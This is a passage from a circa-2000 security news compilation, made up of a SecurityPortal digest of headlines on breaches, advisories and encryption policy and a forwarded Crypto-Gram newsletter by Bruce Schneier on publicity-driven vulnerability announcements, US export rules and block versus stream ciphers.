Alto e-commerce company and stealing nearly 2,000 credit card numbers.
InternetNews: Hackers Close Japanese Government Sites
<http://www.internetnews.com/intl-news/article/hackers.html> - So far this
week, hackers have made three successful attacks on the official Web sites
of two Japanese government agencies, altering the agencies' homepages and
possibly deleting government data.
ZDNet: Smart card 'inventor' lands in jail
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html> - Serge
Humpich says he was wasn't really stealing subway tokens -- just testing his
new invention. It could cost him seven years.
Jan 27, 2000
Wired: U.S. to Push China on Encryption
<http://www.wired.com/news/politics/0,1283,33950,00.html> - The United
States will press China to explain new regulations on encryption technology
at a meeting of economic leaders in Davos, Switzerland, U.S. Trade
Representative Charlene Barshefsky said Thursday.
TheRegister: New hack attack is greater threat than imagined
<http://www.theregister.co.uk/000127-000005.html> - It was news a month
ago; days later it vanished. The mainstream press may have forgotten it, but
security specialists gathered in California last week for the sixth RSA
Conference to consider the growing trend in malicious computer assaults
called distributed denial of service (DDoS) attacks. Dealing with this sort
of assault can be maddening for the primary victim. The clients from which
the attack is launched are themselves intermediate victims who rarely know
that their systems have been compromised. They are in diverse locations
around the world, administered by people who speak different languages,
making it nearly impossible for one victim to explain to another how to cope
with the threat
ZDNet: Does DoubleClick track too closely?
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428392,00.html?chkpt=zdnntop
> - Many e-shoppers don't realize that companies like DoubleClick's Abacus
Direct pick up your trail at one of their sites and follow it wherever you
go
vnunet: Visa strengthens network after number kidnap
<http://www.vnunet.com/News/105782> - Last week a Visa spokesman admitted
that hackers had penetrated its computer network last July, but stressed
that they were detected almost immediately. The company has since hardened
its systems and the hackers have not returned, he said
TheRegister: New crypto technique beats current standard
<http://www.theregister.co.uk/000127-000025.html> - Called Cipherunicorn-A,
the technique creates a number of false keys in addition to the true
encryption key, making it more difficult for potential intruders to crack.
The approach should increase security while remaining compliant with the
Data Encryption Standard (DES) introduced by the US Department of Commerce,
a company spokesperson told The Register
CNet: Corel hurries to fix Linux security hole
<http://news.cnet.com/news/0-1003-200-1533081.html?tag=st.ne.1002.bgif.1003-
200-1533081> - Corel is working to patch a bug with its version of Linux
that could let unauthorized users gain access to machines running Corel
Linux, with a program called Corel Update
ZDNet: Bernstein crypto case to be reheard
<http://www.zdnet.com/zdnn/stories/news/0,4586,2428386,00.html?chkpt=zdhpnew
s01> - A U.S. Appeals Court panel will reconsider an earlier ruling
striking down export limits on computer data scrambling products in light of
new export rules announced this month by the White House
Microsoft Bulletin: Index Server
<http://securityportal.com/topnews/ms00-006.html> - This patch eliminates
two vulnerabilities whose only relationship is that both occur in Index
Server. The first is the "Malformed Hit-Highlighting Argument"
vulnerability. The second vulnerability involves the error message that is
returned when a user requests a non-existent Internet Data Query file
SCO Security Advisories: rtpm, scohelp <http://www.sco.com/security/> -
patches are available for buffer overflow vulnerabilities in rtpm, scohelp
CNN: Security improvements made at national labs
<http://www.cnn.com/2000/US/01/26/nuclear.security.ap/index.html> -
Security at nuclear weapons labs has made "monumental strides" in the past
year, but computer protection is still not 100 percent, the Energy
Department's top security official says.
Jan 26, 2000
Wired: Echelon 'Proof' Discovered
<http://wired.com/news/politics/0,1283,33891,00.html> - References to a
project Echelon have been found for the first time in declassified National
Security Agency documents, says the researcher who found them. Researcher
claims there is no evidence over mis-use of the system
Industry Standard: China Installs Net Secrecy Rules
<http://www.thestandard.net/article/display/0,1151,9125,00.html> - China
clamped new controls onto the Internet on Wednesday to stop Web sites from
"leaking state secrets" and an official newspaper said curbs on news content
were on the way
BBC: Old computer viruses still bite
<http://news.bbc.co.uk/hi/english/sci/tech/newsid_619000/619687.stm> - An
analysis of the most common computer viruses of 1999 shows that although the
threat of new self-propagating viruses is growing, older viruses are still
very common. One boot sector virus, Form, is nearly a decade old but still
appears in the top ten
FCW: Clinton aides fight for cybersecurity bill
<http://www.fcw.com/fcw/articles/2000/0124/web-securitybill-01-26-00.asp> -
Senior Clinton administration officials are urging Congress to support a
bill that would provide a defense against criminals who now have access to
more secure communications thanks to new encryption export regulations
released this month
ZDNet: Scam tricks users into 'stealing'
<http://www.zdnet.com/zdnn/stories/news/0,4586,2427490,00.html?chkpt=zdhpnew
s01> - So just what do computer criminals do with stolen credit cards? How
about tricking innocent electronics shoppers into stealing on their behalf?
That's how at least one scam artist is playing the online credit card game,
MSNBC has learned
Why random numbers are important for security
<http://securityportal.com/direct.cgi?/closet/closet20000126.html> - Modern
computer security requires some level of encryption to be applied to various
kinds of data, for example secure web transactions, or SSH. But something
that often goes ignored is the fact that all good crypto relies on some
degree of randomness, which if not fulfilled properly can lead to a
significant loss in the strength of encryption
Sophos: XM97/Divi-A Excel 97 Macro virus
<http://www.sophos.com/virusinfo/analyses/xm97divia.html> - XM97/Divi-A is
an Excel spreadsheet macro virus. It creates a file called BASE5874.XLS in
the Excel template directory, and will infect other spreadsheets as they are
opened or closed
Caldera: Advisory number: CSSA-1999-039.0 Various security problems with
majordomo
<ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-1999-039.0.txt> -
There are several bugs in majordomo that allow arbitrary users to execute
commands with the privilege of majordomo. If the sendmail aliases file
contains aliases that invoke majordomo, a compromise of additional system
accounts is possible, which may further on lead to a root compromise. An
immediate root exploit has not been found however
Jan 25, 2000
MontrealGazette: How safe is voice mail?
<http://www.montrealgazette.com/news/pages/000124/3483600.html> - When
Steven Boudrias was charged recently with infiltrating the Montreal Urban
Community police department's voice-mail system, the question blinking
alongside the message light on most people's phones is how safe electronic
call-answering really is
Intelligence Gathering on the Net
<http://securityportal.com/direct.cgi?/topnews/intell20000125.html> -
Prerequisites for computer security professionals include a knowledge of
networking, scripting languages, operating systems, and security
countermeasures. High-level technical savvy marks the true professional;
such expertise, however, carries a practitioner only so far. An effective
professional also listens for what's coming down the track
Fairfax: Big keys unlock door to strong encryption
<http://www.it.fairfax.com.au/software/20000125/A39666-2000Jan21.html> -
Australians will find it much easier to get strong cryptography protection
for their on-line business activities following the United States
Government's 14 January decision to liberalise its export restrictions
HP Bulletin: Security Vulnerability with PMTU strategy
<http://securityportal.com/topnews/hp20000124.html> - An HP-UX 10.30/11.00
system can be used as an IP traffic amplifier. Small amounts of inbound
traffic can result in larger amounts of outbound traffic
Sophos: WM97/Melissa-AK virus
<http://www.sophos.com/virusinfo/analyses/wm97melissaak.html> -
WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a
copy of the infected document to the first 50 entries in the Outlook address
book. If the current day of the month is equal to the current minute it will
insert the phrase Symbytes Ver. 7.x mucking about..The Mahatma. into the
active document
Cisco: IPsec/CEF Software Defect on Route Switch Processors
<http://www.cisco.com/warp/public/770/fn10611.shtml> - On all RSP and RSM
processors, when an interface in the router is configured with an IPSec
crypto map and the switching mode is Cisco Express Forwarding (CEF), the RSP
and RSM will restart when it attempts to decrypt IPSec packets. Patch not
yet available, workaround is to disable Cisco Express Forwarding
Sunday Times: French spies listen in to British calls
<http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws03006.html?9
99> - French intelligence is intercepting British businessmen's GSM calls
after investing millions in satellite technology for its listening stations
Computer Currents: Cybercrime Harder to Prosecute
<http://www.computercurrents.com/newstoday/00/01/24/news2.html> - US
Justice Department officials reportedly called computer crime a growing
menace to corporations worldwide, and admitted that law enforcement agents
face major hurdles in combating it
ZDNet: Hackers impersonate AOL users
<http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnew
s01> - Teenage hackers are pretending to be AOL users, then coercing
friends into divulging personal information
Jan 24, 2000
ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave
<http://abcnews.go.com/sections/us/DailyNews/cybercrime_part2.html> - From
Web site hackers to child pornographers, credit card thieves and e-mail
terrorists, crime online is mushrooming, says Schwartz. And the crime
fighters are struggling to catch up
Wired: More Bad News for DVD Hackers
<http://www.wired.com/news/politics/0,1283,33845,00.html> - Judge William
J. Elfving issued a preliminary injunction Friday ordering 21 defendants to
stop posting code that breaks through the security software of DVDs to their
Web sites
Wired: Outpost Leaves Data Unguarded
<http://www.wired.com/news/technology/0,1282,33842,00.html> - While James
Wynne was checking his online order Friday at Outpost.com, he noticed
something curious -- he could check orders from other people, too
******* What's new with SecurityPortal.com *******
The Unbreakable Cipher: Why Not Just Stay With Perfection?
John Savard gets under the covers of ciphers to explain why the market uses
DES and RSA algorithms instead of the "perfect" cipher. Read the full story
here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html>
Tell us how we are doing. Send any other questions or comments to
webmaster@securityportal.com <mailto:webmaster@securityportal.com> .
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com>
@HWA
19.0 CRYPTOGRAM Jan 15th
~~~~~~~~~~~~~~~~~~~
Forwarded From: Bruce Schneier <schneier@counterpane.com>
CRYPTO-GRAM
January 15, 2000
by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on computer security and cryptography.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 2000 by Bruce Schneier
** *** ***** ******* *********** *************
In this issue:
"Key Finding" Attacks and Publicity Attacks
Counterpane -- Featured Research
News
New U.S. Encryption Regulations
Counterpane Internet Security News
The Doghouse: Netscape
Block and Stream Ciphers
Comments from Readers
** *** ***** ******* *********** *************
"Key Finding" Attacks and Publicity Attacks
A couple of weeks ago the New York Times reported a new "key finding"
attack. This was a follow-up to some research discussed here some months
ago, showing how to search for, and find, public and private cryptographic
keys in software because of their random bit patterns.
The company nCipher demonstrated that someone who has access to a Web
server that uses SSL can find the SSL private key using these techniques,
and potentially steal it. nCipher's press release talked of "a significant
vulnerability to today's Internet economy." Huh? Why is this news?
It's not the fact that the SSL private keys are on the Web server. That's
obvious; they have to be there. It's not the fact that someone who has
access to the Web server can potentially steal the private keys. That's
obvious, too. It's not the news that a CGI attack can compromise data on a
Web server. We've seen dozens of those attacks in 1999. Even the press
release admits that "no information is known to have been compromised using
a 'key-finding' attack. Neither nCipher nor the New York Times found
anyone who was vulnerable. But wait . . . nCipher sells a solution to this
"problem." Okay, now I understand.
I call this kind of thing a publicity attack. It's a blatant attempt by
nCipher to get some free publicity for the hardware encryption
accelerators, and to scare e-commerce vendors into purchasing them. And
people fall for this, again and again.
This kind of thing is happening more and more, and I'm getting tired of it.
Here are some more examples:
* An employee of Cryptonym, a PKI vendor, announced that he found a
variable with the prefix "NSA" inside Microsoft's cryptographic API. Based
on absolutely zero evidence, this was held up as an example of NSA's
manipulation of the Microsoft code.
* Some people at eEye discovered a bug in IIS last year, completely
compromising the product. They contacted Microsoft, and after waiting only
a week for them to acknowledge the problem, they issued a press release and
a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers
jumped on the exploit. eEye sells vulnerability assessment tools and
security consulting, by the way.
I'm a fan of full disclosure -- and definitely not a fan of Microsoft's
security -- and believe that security vulnerabilities need to be publicized
before they're fixed. (If you don't publicize, the vendors often don't
bother fixing them.) But this practice of announcing "vulnerabilities" for
the sole purpose of hyping your own solutions has got to stop.
Here are some examples of doing things right:
* The University of California Berkeley researchers have broken just about
every digital cellphone security algorithm. They're not profiting from
these breaks. They don't publish software packages that can listen in on
cellphone calls. This is research, and good research.
* Georgi Guninski has found a huge number of JavaScript holes over the
past year or so. Rather than posting scary exploits and cracking tools
that script kiddies could take advantage of, and rather than trying to grab
the limelight, he has been quietly publishing the problems and available
workarounds. Of course, the downside is that these bugs get less attention
from Microsoft and Netscape, even though they are as serious as many others
that have received more press attention and thus get fixed quickly by the
browser makers. Nonetheless, this is good research.
* The L0pht has done an enormous amount of good by exposing Windows NT
security problems, and they don't try to sell products to fix the problems.
(Although now that they've formed a VC-funded security consulting company,
@Stake, they're going to have to tread more carefully.)
* Perfecto markets security against CGI attacks. Although they try to
increase awareness of the risks, they don't go around writing new CGI
exploits and publicizing them. They point to other CGI exploits, done by
hackers with no affiliation to the company, as examples of the problem.
* Steve Bellovin at AT&T labs found a serious hole in the Internet DNS
system. He delayed publication of this vulnerability for years because
there was no readily available fix.
How do you tell the difference? Look at the messenger. Who found the
vulnerability? What was their motivation for publicizing? The nCipher
announcement came with a Business Wire press release, and a PR agent who
touted the story to reporters. These things are not cheap -- the press
release alone cost over $1000 -- and should be an obvious tip-off that
other interests are at stake.
Also, look critically at the exploit. Is it really something new, or is it
something old rehashed? Does it expose a vulnerability that matters, or
one that doesn't? Is it actually interesting? If it's old, doesn't
matter, and uninteresting, it's probably just an attempt at press coverage.
And look at how it is released. The nCipher release included a hacker
tool. As the New York Times pointed out, "thus making e-commerce sites
more vulnerable to attack and more likely to buy nCipher's product."
Announcements packaged with hacker tools are more likely to be part of the
problem than part of the solution.
I am a firm believer in open source security, and in publishing security
vulnerabilities. I don't want the digital cellphone industry, or the DVD
industry, to foist bad security off on consumers. I think the quality of
security products should be tested just as the quality of automobiles is
tested. But remember that security testing is difficult and
time-consuming, and that many of the "testers" have ulterior motives.
These motives are often just as much news as the vulnerability itself, and
sometimes the announcements are more properly ignored as blatant
self-serving publicity.
The NY Times URLs using their search function change daily, but you can go
to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the
article title is "Attacks on Encryption Code Raise Questions About Computer
Vulnerability".
NCipher's press release:
http://www.ncipher.com/news/files/press/2000/vulnerable.html
NCipher's white paper (Acrobat format):
http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf
** *** ***** ******* *********** *************
Counterpane -- Featured Research
"A Cryptographic Evaluation of IPsec"
N. Ferguson and B. Schneier, to appear
We perform a cryptographic review of the IPsec protocol, as described in
the November 1998 RFCs. Even though the protocol is a disappointment --
our primary complaint is with its complexity -- it is the best IP security
protocol available at the moment.
http://www.counterpane.com/ipsec.html
** *** ***** ******* *********** *************
News
You can vote via the Internet in the Arizona Democratic primary. Does
anyone other than me think this is terrifying?
http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html
An expert at the British government's computer security headquarters has
endorsed open-source solutions as the most secure computer architecture
available:
http://212.187.198.142/news/1999/50/ns-12266.html
The DVD Copy Control Association is pissed, and they're suing everyone in
sight.
http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/
Moore's Law and its effects on cryptography:
http://www.newscientist.com/ns/20000108/newsstory2.html
Information warfare in the Information Age:
http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html
http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html
Radio pirates: In the U.K., some radios can receive a digital signal that
causes them to automatically switch to stations playing traffic reports.
Hackers have figured out how to spoof the signal, forcing the radio to
always tune to a particular station. Good illustration of the hidden
vulnerabilities in digital systems.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm
http://uk.news.yahoo.com/000106/18/d6jt.html
Well, this sure is inaccurate:
http://www.lancrypto.com/algorithms_e.htm
Some months ago I mentioned the Y2K notice from Hart Scientific. They now
have a sequel:
http://www.hartscientific.com/y2k-2.htm
RSA "digital vault" software:
http://news.excite.com/news/pr/000111/ma-rsa-keon-software
E-commerce encryption glitch; a good example of why people are the worst
security problem. A programmer just forgot to reactivate the encryption.
http://news.excite.com/news/r/000107/17/news-news-airlines-northwest
Become an instant cryptography portal. Encryption.com, encryption2000.com,
and 1-800-ENCRYPT are for sale.
http://news.excite.com/news/bw/000111/wa-azalea-software
http://www.encryption.com
Mail encryption utility that lets you take back messages you regret
sending. Does anyone believe that this is secure?
http://www.zdnet.com:80/anchordesk/story/story_4323.html
Human GPS implants:
http://www.newscientist.com/ns/20000108/newsstory8.html
Clinton's hacker scholarships:
http://chronicle.com/free/2000/01/2000011001t.htm
Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to
hack today?
http://www.networkworld.com/news/2000/0110vpn.html
Someone stole a bunch of credit card numbers from CD Universe, tried
extortion, then posted some:
http://www.wired.com/news/technology/0,1282,33563,00.html
http://www.msnbc.com/news/355593.asp
and Cybercash's reaction (with a nice quote about how impregnable their
product's security is; way to wave a red flag at the hackers):
http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html
An interesting three-part article about video surveillance and its effect
on society:
http://www.villagevoice.com/issues/9840/boal.shtml
The system used to fund a series of anti-Bush commercials loosely resembles
my "street performer protocol," using the credit card company instead of a
publisher as a trusted third party. They validate your card when you
pledge, but only charge it if they get enough to run an ad:
http://www.gwbush.com/
Street performer protocol:
http://www.counterpane.com/street_performer.html
You can steal subway rides on the NY City system by folding the Metrocard
at precisely the right point. The Village Voice and NY Times ran stories
about it, but those are no longer available, at least for free. There's a
copy of the NYTimes story here:
http://www.monkey.org/geeks/archive/9801/msg00052.html
The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting
around 54:35. The RealAudio is linked from here:
http://www.2600.com/offthehook/1998/0298.html
The White House released a national plan to protect America's computer
systems from unauthorized intrusions. This plan includes the establishment
of the controversial Federal Intrusion Detection Network (FIDNET), which
would monitor activity on government computer systems. (So far, there are
no plans to monitor commercial systems, but that can change. The
government does want to involve industry in this.) The plan also calls for
the establishment of an "Institute for Information Infrastructure
Protection" and a new program that will offer college scholarships to
students in the field of computer security in exchange for public service
commitments. The scholarship program seems like a good idea; we need more
computer security experts.
http://www.thestandard.com/article/display/0,1151,8661,00.html
http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html
http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism
http://www.msnbc.com/news/355783.asp
http://www.computerworld.com/home/print.nsf/all/000107DB3A
EPIC analysis:
http://www.epic.org/security/CIP/
White House plan (PDF):
http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105
.pdf
White House press release:
http://www.epic.org/security/CIP/WH_pr_1_7_00.html
White House press briefing:
http://www.epic.org/security/CIP/WH_briefing_1_7_00.html
** *** ***** ******* *********** *************
New U.S. Encryption Regulations
We have some, and they're a big improvement. On the plus side, "retail"
encryption products -- like browsers, e-mail programs, or PGP -- will be
widely exportable to all but a few countries "regardless of key length or
algorithm." On the minus side, the new regulations are complex (an
unending stream of work for the lawyers) and will still make it difficult
for many people to freely exchange encryption products. They also do not
address the Constitutional free speech concerns raised by encryption export
controls.
Major features of the new regs:
* "Retail" encryption products are be exportable, regardless of key length
or algorithm, to all but the designated "T-7" terrorist nations. In order
to export you need to fill out paperwork. You need to get a retail
classification, submit your product to a one-time technical review, and
submit periodic reports of who products are shipped to (but not necessarily
report end users).
* Export of encryption products up to 64 bits in key length is completely
liberalized.
* "Non-retail" products will require a license for many exports, such as to
foreign governments or foreign ISPs and telcos under certain circumstances.
* Source code that is "not subject to an express agreement for the payment
of a licensing fee or royalty for commercial production or sale of any
product developed with the source code" is freely exportable to all but the
T-7 terrorist countries. Source code exporters are required to send the
Department of Commerce a copy of the code, or a URL, upon publication.
Note that posting code on a web site for anonymous download is allowed; you
are not required to check that downloaders might be from one of the
prohibited countries.
One obvious question is: "How does this affect the Bernstein and Karn court
cases?" I don't know yet. The free speech concerns are not addressed, but
the things that Bernstein and Karn wanted to do are now allowed. We'll
have to see what the attorneys think.
A more personal question is: "How does this affect the Applied Cryptography
source code disks?" Near as I can tell, all I have to do is notify the
right people and I can export them. I will do so as soon as I can. Stay
tuned.
The actual regs (legalese):
http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_crypt
oexport_regs.html
EFF's press release:
http://www.eff.com/11300_crypto_release.html
Reuters story with BSA and Sun reactions:
http://news.excite.com/news/r/000112/19/tech-tech-encryption
Reuters story with EFF reaction:
http://news.excite.com/news/r/000113/13/tech-tech-encryption
AEA reaction press release:
http://news.excite.com/news/pr/000112/dc-aea-encryption-reg
ACLU and EPIC reaction:
http://news.excite.com/news/zd/000113/18/crypto-compromise-a
** *** ***** ******* *********** *************
Counterpane Internet Security News
Bruce Schneier profiled in Business Week:
http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm
Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll
also be at BlackHat and DefCon in Las Vegas.
http://www.blackhat.org
http://www.defcon.org
Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18
Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the
program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and
several other really smart people.
** *** ***** ******* *********** *************
The Doghouse: Netscape
Netscape encrypts users' e-mail passwords with a lousy algorithm. If this
isn't enough, their comments to the press cement their inclusion in the
doghouse:
"Chris Saito, the senior director for product management at Netscape, said
that the option to save a password locally was included for convenience.
Saito added that Netscape didn't use a stronger encryption algorithm to
protect passwords so that 'computer experts could still access the
information, in case someone forgot their password.'"
In other words, they implemented lousy security on purpose.
"Netscape's Saito said the company wasn't aware of the vulnerability and
added that a 'security fix' would be forthcoming if that vulnerability were
proved to exist. If the Javascript vulnerability doesn't exist, a password
stealer would have to have physical access to a user's computer to figure
out the algorithm."
Note the complete ignorance of viruses like Melissa, or Trojan horses like
Back Orifice.
"Saito noted that Netscape already has numerous safety features, including
a Secure Sockets Layer, which enables users to communicate securely with
Web servers, and a protocol for encrypting e-mail messages sent."
None of which matters if the password is stolen.
http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html
RST's information:
http://www.rstcorp.com/news/bad-crypto.html
http://www.rstcorp.com/news/bad-crypto-tech.html
** *** ***** ******* *********** *************
Block and Stream Ciphers
Block and stream ciphers both transform a message from plaintext to
ciphertext one piece at a time. Block ciphers apply the same
transformation to every piece of the message, and typically deal with
fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream
ciphers apply a different transformation to each piece of the message, and
typically deal with fairly small pieces of the message (1 bit, 1 byte) at a
time.
Traditionally they have been separate areas of research, but these days
they are converging. And if you poke around at the issues a bit, you'll
see that they not very different at all.
Stream ciphers first. Traditional stream ciphers consist of three standard
pieces: an internal state, a next-state function, and a
plaintext-to-ciphertext transformation function. The internal state is
generally small, maybe a hundred bits, and can be thought of as the key.
The next-state function updates the state. The transformation function
takes a piece of plaintext, mixes it with the current state, and produces
the same size ciphertext. And then the stream cipher goes on to the next
piece.
The security of this scheme is based on how cryptographically annoying the
two functions are. Sometimes just one of the functions is
cryptographically annoying. In electronic stream ciphers, a complicated
next-state function is usually combined with a simple transformation that
takes the low-order bit of the state and XORs it with the plaintext. In
rotor machines, such as the German Enigma, the next-state function was a
simple stepping of various rotors, and the transformation function was very
complicated. Sometimes both are cryptographically complicated.
These ciphers could generally operate in two modes, depending on the input
into the next-state function. If the only input was the current state,
these were called output-feedback (OFB) ciphers. If there was the
additional input of the previous ciphertext bit, these were called
cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew
these modes as "key auto-key" (KAK) and "ciphertext auto-key (CTAK),
respectively.) And you chose one mode over the other because of error
propagation and resynchronization properties. (Applied Cryptography
explains all this in detail.)
Traditionally, stream cipher algorithms were as simple as possible. These
were implemented in hardware, and needed as few gates as possible. They
had to be fast. The result was many designs based on simple mathematical
functions: e.g., linear feedback shift registers (LFSRs). They were
analyzed based on metrics such as linear complexity and correlation
immunity. Analysts looked at cycle lengths and various linear and affine
approximations. Most U.S. military encryption algorithms, at least the
ones in general use in the 1980s and before, are stream ciphers of these sorts.
Block ciphers are different. They consist of a single function: one that
takes a plaintext block (a 64-bit block size is traditional) and a key and
produces a ciphertext block. The NSA calls these ciphers codebooks, and
that is an excellent way to think of them. For each key, you can imagine
building a table. On the left column is every possible plaintext block; on
the right column is every possible ciphertext block. That's the codebook.
It would be a large book, 18 billion billion entries for the smallest
commonly used block ciphers, so it is easier to just implement the
algorithm mathematically -- especially since you need a new book for each
key. But in theory, you could implement it as a single table lookup in a
very large codebook.
Block ciphers can be used simply as codebooks, encrypting each 64-bit block
independently (and, in fact, that is called electronic codebook (ECB)
mode), but that has a bunch of security problems. An attacker can
rearrange blocks, build up a portion of the codebook if he has some known
plaintext, etc. So generally block ciphers are implemented in one of
several chaining modes.
Before listing the block cipher chaining modes, it's worth noticing that a
block cipher algorithm can serve as any of the functions needed to build a
stream cipher: the next-state function or the output function. And, in
fact, that is what block cipher modes are: stream ciphers built using the
block cipher as a primitive. A block cipher in output-feedback mode is
simply the block cipher used as the next-state function, with the output of
the block cipher being the simple output function. A block cipher in
cipher-feedback mode is the same thing, with the addition of the ciphertext
being fed into the next-state function. A block cipher in counter mode
uses the block cipher as the output function, and a simple counter as the
next-state function. Cipher block chaining (CBC) is another block-cipher
mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the
block cipher is part of the plaintext-to-ciphertext transformation
function, and the next-state function is simple.
For some reason I can't explain, for many years academic research on block
ciphers was more practical than research on stream ciphers. There were
more concrete algorithm proposals, more concert analysis, and more
implementations. While stream cipher research stayed more theoretical,
block ciphers were used in security products. (I assume this was the
reverse in the military, where stream ciphers were used in products and
were the target of operational cryptanalysis resources.) DES's official
sanction as a standard helped this, but before DES there was Lucifer. And
after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many
more.
Recently, stream ciphers underwent something of a renaissance. These new
stream ciphers were designed for computers and not for discrete hardware.
Instead of producing output a bit at a time, they produced output a byte at
a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were
no longer constrained by a small internal state -- RC4 takes a key and
turns it into a 256-byte internal state, SEAL's internal state is even
larger -- or tight hardware-based complexity restrictions. Stream ciphers,
which used to be lean and mathematical, started looking as ugly and kludgy
as block ciphers. And they started appearing in products as well.
So, block and stream ciphers are basically the same thing; the difference
is primarily a historical accident. You can use a block cipher as a stream
cipher, and you can take any stream cipher and turn it into a block cipher.
The mode you use depends a lot on the communications medium -- OFB or CBC
makes the most sense for computer communications with separate error
detection, while CFB worked really well for radio transmissions -- and the
algorithm you choose depends mostly on performance, standardization, and
popularity.
There's even some blurring in modern ciphers. SEAL, a stream cipher, looks
a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block
cipher, looks very much like a stream cipher. Some new algorithms can be
used both as block ciphers and stream ciphers.
But stream ciphers should be faster than block ciphers. Currently the
fastest block ciphers encrypt data at 18 clock cycles per byte (that's
Twofish, the fastest AES submission). The fastest stream ciphers are even
faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a
general 32-bit architecture for comparison; your actual performance may
vary somewhat.) I don't believe this is an accident.
Stream ciphers can have a large internal state that changes for every
output, but block ciphers have to remain the same. RC4 has a large table
-- you can think of it as an S-box -- that changes every time there is an
output. Most block ciphers also have some kind of S-box, but it remains
constant for each encryption with the same key. There's no reason why you
can't take a block cipher, Blowfish for example, and tweak it so that the
S-boxes modify themselves with every output. If you're using the algorithm
in OFB mode, it will still encrypt and decrypt properly. But it will be a
lot harder to break for two reasons. One, the internal state is a moving
target and it is a lot harder for an attacker to build model of what is
going on inside the state. Two, if the plaintext-to-ciphertext
transformation is built properly, attacks based on chosen plaintext or
chosen ciphertext are impossible. And if it is a lot harder to break a
cipher with self-modifying internals, then you can probably get by with
fewer rounds, or less complexity, or something. I believe that there is
about a factor of ten speed difference between a good block cipher and a
good stream cipher.
Designing algorithms is very hard, and I don't suggest that people run out
and modify every block cipher they see. We're likely to continue to use
block ciphers in stream-cipher modes because that's what we're used to, and
that's what the AES process is going to give us as a new standard. But
further research into stream ciphers, and ways of taking advantage of the
inherent properties of stream ciphers, is likely to produce families of
algorithms with even better performance.
** *** ***** ******* *********** *************
Comments from Readers
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: German smart-card hack
The note on "German hackers have succeeded in cracking the Siemens digital
signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong. I have been in
contact with the German Hacker (Christian Kahlo) behind this story. He
discovered that one user of the Siemens SLE44 chip series included in his
ROM software a routine that allowed him to upload and execute not only
interpreter bytecode, but also raw 8052 assembler instructions. Using this
undocumented facility, Christian uploaded a tiny assembler program that
dumped the entire ROM of the card. The ROM was investigated, posted on the
USENET as a documented disassembler listing in a TeX file and no
vulnerabilities were found. Christian also discovered in the ROM that the
SLE chips send out the chip type and serial number when the I/O line is
held low during a positive reset edge and the following 600-700 clock
cycles, which is a perfectly normal feature (comparable to the BIOS
power-up message of a PC) that is fully documented in the SLE44 data sheets
and that is not security relevant.
No smartcard applications were hacked this way, no vulnerability was found
in any smartcard application, and definitely no private keys were
compromised. All this also has nothing to do with digital signatures. Any
news to the contrary is the result of misunderstandings by journalists, who
as usual fill in the gaps of the story with their limited technical
background knowledge and try to formulate such reports to be more
spectacular than the story behind them. The only policy that has been
violated here is that Siemens -- like most other smartcard chip producers
-- tries to make sure that nobody except big customers can easily get
access to smartcard development kits that allow to upload assembler code
directly, which might otherwise shorten the learning curve for a
microprobing attacker slightly. Users of Siemens chips that allow code
uploads are apparently required to use a bytecode interpreter instead.
This policy seems to have been ignored secretly by one Siemens customer who
left a backdoor in his byte-code interpreter to enable the later upload of
high-speed crypto routines that cannot be implemented sufficiently
efficient in the bytecode.
Christian discovered this, even though he decided *not* publish the details
on how he did this or the name of the Siemens customer in whose cards he
had discovered this. All he published was a dump of the standard Siemens
SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a
piece of code that had already been known semi-publicly for many years in
the pay-TV hacking community from successful microprobing attacks on the
SLE44 series. Christian's main contribution is that he has discovered a
very nice low-cost assembler-level development kit for some of the SLE
smartcards, which used to cost a fortune and an NDA before. This is not
the first time that this has happened: Pay-TV smartcards have been shipped
before with software that
provides for uploads of EEPROM software patches with broken authentication
techniques, which has been known and used in the smartcard tampering
community for many years.
From: anonymous
Subject: Re: New U.S. Crypto Export Regulations
In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S.
crypto export regulations, and I can agree with everything you said.
However, I believe you missed something important: the view FROM the rest
